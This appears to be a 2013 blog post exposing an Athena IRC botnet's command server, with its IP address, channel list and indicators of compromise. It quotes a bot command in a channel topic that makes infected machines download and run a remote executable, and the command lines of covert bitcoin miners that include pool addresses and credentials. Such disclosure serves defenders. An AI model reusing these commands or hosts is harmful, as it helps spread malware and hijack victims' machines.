thebankslife.no-ip.biz (Athena irc botnet hosted by shellxnet.com)

By I_Post_Ur_Info, August 10, 2013

Resolved thebankslife.no-ip.biz to 72.20.28.232

Server: thebankslife.no-ip.biz
Port: 6667
Channel          Users   Topic
#sexlyfe         2       [+nt]
#Syncrude        78      [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5
#bankslife       35      [+nt] .gtfo
Channel: #Syncrude
Now talking on #Syncrude
Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5
Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013)

Bitcoin mining info:
macromedia.exe” -a scrypt -o http://192.241.176.12:8332 -u Kingz.2 -p x -g no -t 7
Shell.exe” -a sha256 -o stratum+tcp://stratum.bitcoin.cz:3333 -u syncrude.worker1 -p 8avHuCXw -t 0 -I 10

Hosting infos: http://whois.domaintools.com/72.20.28.232

Related md5s (search on malwr.com to download samples):
Athena 152d0779306990ade0bbca13cb79c6fb
Bitcoin miner 83e074eb513c2ed0f5e7975ffd7b8924

Categories: Uncategorized

Tags: AthenaBitcoin Miner Botnet

Previous postbitcoinglobalbanking.com (Betabot http botnet hosted by leaseweb.com)

Next postspambox.su (snk aspermod irc botnet hosted by Cityline Ltd)

illuminati.sx (Plasma http botnet hosted by worldstream.nl)

meziamussucemaqueue.su (Betabot http botnet hosted by sunnyvision.com)

aba.net.ua (Athena http botnet hosted by thehost.com.ua)